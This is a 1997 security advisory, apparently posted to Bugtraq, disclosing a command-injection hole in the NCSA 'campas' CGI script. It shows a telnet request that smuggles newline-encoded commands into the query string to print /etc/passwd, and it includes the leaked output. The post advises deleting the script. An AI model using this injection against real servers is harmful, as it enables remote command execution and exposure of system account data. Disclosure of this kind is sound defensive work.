campus cgi hole Description: A hole very similar to the standard phf hole alows people to execute arbitrary commands through the campus cgi. Author: Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO> Compromise: Execute arbitrary commands remotely as the owner of the cgi-running process (commonly nobody or daemon). Vulnerable Systems: Those running a vulnerable version of the campus cgi. Version 1.2 is vulnerable. It may be distributed with the NCSA server. Date: 15 July 1997 Date: Tue, 15 Jul 1997 18:24:31 -0500 From: Francisco Torres <ftorres@CASTOR.JAVERIANA.EDU.CO> To: BUGTRAQ@NETSPACE.ORG Subject: Bug CGI campas CAMPAS SECURITY BUG ------------------- ET Lownoise Colombia 1997 CGI: campas #!/bin/sh #pragma ident "@(#)campas.sh 1.2 95/05/24 NCSA" Impact: Execute commands Exploit: > telnet www.xxxx.net 80 Trying 200.xx.xx.xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a <PRE> root:x:0:1:Super-User:/export/home/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false .... continue :P Solution: 1-If u dont use it erase it.! 2-Dont use it again.. (go point 1) Well another line to put in vito.ini. ET LOwnoise 1997 Colombia Addendum(if any):